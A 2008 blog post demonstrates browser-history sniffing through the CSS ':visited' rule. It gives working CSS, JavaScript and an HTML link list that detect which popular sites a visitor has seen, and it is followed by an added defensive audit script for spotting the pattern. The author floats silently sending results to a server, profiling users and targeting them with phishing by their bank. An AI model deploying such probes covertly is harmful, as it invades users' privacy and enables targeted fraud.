I can see pages you've been to (slightly sneaky exploit)

Ben Hindmarch, 12th June 08

I can check to see which websites you've been to from Alexa's Top 100 websites:

Click the button above.

What it is

A while ago I wrote in my blog about how to check where visitors to your site have been. I thought I'd follow this up with a practical example of this in action.

By setting the CSS 'left' property (it doesn't have to be 'left'; that's just the first one I tried that worked) for the 'a:visited' selector, JavaScript can test each link on a page for that same 'left' value to determine whether you've been to the link location or not.

This relies on you having your browser's history switched on. If you've disabled your browser's history there is no way for the script to determine where you've been.

Update: (13th June 08). I've done a little more digging after my initial research, and found 'Spyjax', an article highlighting the same issue, with alternative code doing exactly the same.

**I'd be interested if this DOESN'T work for you. Please email me (ben (at) this domain name) with your browser version**

What it isn't

This code cannot read your entire browser history. I can't receive a list of URLs you've been to without providing a complete list of possible URLs to test against. This page takes a list of websites I've provided and checks to see if you've been to any of them. If you have, it will say so on the screen.

How it works

The CSS:

<style type="text/css">
<!--
#links a {width: 0px; overflow: hidden;}
a {position: absolute;}
a:visited {left: 1px;} /* This is the key to it all:
			I just need to use JavaScript to
			check which links have been set
			a value for style.left */
-->
</style>
			

The JavaScript:

<script type="text/javascript">
window.onload = function() {
	var i;

	//Clear the results div
	document.getElementById('results').innerHTML = '';

	//Get the links I've listed into an array
	var links = document.getElementById('links').getElementsByTagName('a');

	//An array for storing the sites I've visited
	var visited = [];

	//Identify the pages the user has been to, putting them in the 'visited' array.
	//Links matched by 'a:visited {left: 1px;}' are the ones whose offsetLeft is 1
	for (i = 0; i < links.length; i++) {
		if (links[i].offsetLeft == 1) visited.push(links[i].href);
	}

	//Reveals the results on page - bit of a hack. Could potentially be replaced with an AJAX function to
	//send data to the server without the user's knowledge
	for (i = 0; i < visited.length; i++) {
		document.getElementById('results').innerHTML += 'You have recently visited: ' + visited[i].link(visited[i]) + '<br />';
	}
};
</script>
			

The HTML (the list of links is shortened here to what's running in the source of this page):

<div id="links">
	<!-- These are the links I'm going to check against -->
	<a href="http://www.yahoo.com/">.</a>
	<a href="http://www.google.com/">.</a>
	<a href="http://www.youtube.com/">.</a>
	<a href="http://www.live.com/">.</a>
	<a href="http://www.msn.com/">.</a>
	<a href="http://www.myspace.com/">.</a>
	<a href="http://www.facebook.com/">.</a>
	<a href="http://www.blogger.com/">.</a>
	<a href="http://www.orkut.com/">.</a>
	<a href="http://www.microsoft.com">.</a>
	<a href="http://www.google.co.in">.</a>
	<a href="http://www.ebay.com/">.</a>
	<a href="http://www.hi5.com/">.</a>
	<a href="http://www.aol.com/">.</a>
	<a href="http://www.google.co.uk/">.</a>
	<a href="http://www.photobucket.com/">.</a>
	<a href="http://www.amazon.com/">.</a>
	<a href="http://www.imdb.com/">.</a>
	<a href="http://www.imageshack.us/">.</a>
</div>
<div id="results"> <!-- Javascript puts the results in here --> </div>
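
A defender's view of the CSS and JavaScript above, as an added example that is not part of the original post: a small Node.js audit that flags page source combining a ':visited' rule that sets a layout property with a script that reads element geometry back. The function names, the LAYOUT_PROPS list and the BENIGN_CSS sample are constructed for this example, and it covers only the layout-property variant shown on this page.

```javascript
// Added example: static audit for the a:visited layout side channel.
// LAYOUT_PROPS is a constructed, non-exhaustive list of properties whose
// effect a script can read back through element geometry.
const LAYOUT_PROPS = new Set(['left', 'top', 'right', 'bottom', 'width', 'height',
  'margin', 'padding', 'display', 'position', 'float', 'font-size', 'line-height']);
const GEOMETRY_READS =
  /\b(offset(?:Left|Top|Width|Height)|client(?:Width|Height)|getBoundingClientRect|getComputedStyle|currentStyle)\b/g;

// Declarations in :visited rules that set a layout-affecting property.
function findVisitedLayoutRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, '') // strip CSS comments
                     .replace(/<!--|-->/g, '');         // strip legacy HTML comment wrappers
  const findings = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const selector = m[1].trim();
    if (!/:visited\b/i.test(selector)) continue;
    for (const decl of m[2].split(';')) {
      const idx = decl.indexOf(':');
      if (idx < 0) continue;
      const property = decl.slice(0, idx).trim().toLowerCase();
      const base = property.replace(/-(left|right|top|bottom)$/, ''); // margin-left -> margin
      if (LAYOUT_PROPS.has(property) || LAYOUT_PROPS.has(base)) {
        findings.push({ selector, property, value: decl.slice(idx + 1).trim() });
      }
    }
  }
  return findings;
}

// Distinct geometry/style read-backs referenced by a script.
function findGeometryReads(jsText) {
  return [...new Set(jsText.match(GEOMETRY_READS) || [])];
}

// Suspicious only when both halves of the technique are present.
function auditPage(cssText, jsText) {
  const rules = findVisitedLayoutRules(cssText);
  const reads = findGeometryReads(jsText);
  return { rules, reads, suspicious: rules.length > 0 && reads.length > 0 };
}

// Inputs: this page's CSS rules (comment shortened) and its test line; BENIGN_CSS is constructed.
const PAGE_CSS = '#links a {width: 0px; overflow: hidden;}\n' +
  'a {position: absolute;}\na:visited {left: 1px;} /* key rule */';
const PAGE_JS = 'if (links[i].offsetLeft == 1) visited.push(links[i].href);';
const BENIGN_CSS = 'a {position: absolute;}\na:visited {color: purple;}';
console.log(auditPage(PAGE_CSS, PAGE_JS), auditPage(BENIGN_CSS, PAGE_JS).suspicious);
```

A hit is a prompt for manual review of the page or third-party include, not proof of history probing, since both halves are common on their own.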
			

What it means

On this page I'm not doing anything with the data other than displaying it back to you. I'm also only starting the script when you press the button. If I wanted to, I could put this code in a website, running it as soon as the page loads without you knowing and send the information back to the server.

I could use the information to find your particular market demographic: If you've been visiting gamespot.com and ign.com I could assume you're a male in your teens to mid-thirties (if you're into games). If you've been to facebook.com and not myspace.com you could be a college graduate. If you've been to Study2U.com or Elearners.com you might be in the market for an online degree.

I could use the information to find out what bank you belong to: If you've been to bankofamerica.com or HSBC I can work out pretty accurately where you bank. If at some point you enter your email address on my site I can target you with some pesky phishing emails.

I can find out which of my competitors' sites you've been to: If I were to operate Study2u.com (which I do), I could run this script (which I don't) and find out if you've been to elearners.com, worldwidelearn.com or any of our other competitors.

Please email comments through to me at ben (at) this domain name. Also it would be great if you could let me know if this script doesn't work for you and you have your browser history enabled (and are viewing the page with JavaScript and CSS switched on).

Recommendations